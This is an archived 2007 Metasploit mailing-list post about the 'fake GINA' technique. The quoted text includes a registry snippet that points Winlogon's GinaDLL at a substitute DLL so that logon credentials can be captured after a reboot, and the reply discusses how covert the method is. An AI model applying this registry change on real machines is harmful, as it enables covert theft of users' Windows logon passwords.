Metasploit mailing list archives

Fake Gina

From: mmiller at hick.org (mmiller at hick.org)
Date: Sun, 25 Mar 2007 12:23:24 -0700

On Sun, Mar 25, 2007 at 08:41:16PM +0200, Jerome Athias wrote:

actualy i use this:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"GinaDLL"="mscad.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"SAS_S"=dword:00000001

and i wait a reboot
i didn't go further on it but maybe we can find a way to have it working 
on the fly
i will test it


Just a quick comment.  IIRC, using a fake GINA will prevent fast user
switching.  If you're going for covertness, it's probably not the way to
go :)  Then again, writing the GINA DLL to disk in the first place
wouldn't be too covert.  If you're not all that worried about
covertness, I could see how it'd be useful.

Current thread:

Fake Gina Jerome Athias (Mar 25)
- Fake Gina H D Moore (Mar 25)
  - Fake Gina Jerome Athias (Mar 25)
    - Fake Gina mmiller at hick.org (Mar 25)
    - Fake Gina Nicolas RUFF (Mar 26)
    - Fake Gina ryan underwood (Mar 26)
    - Fake Gina Nicob (Mar 26)
    - Fake Gina mmiller at hick.org (Mar 26)
- <Possible follow-ups>
- Fake Gina 0x90 at hushmail.com (Mar 25)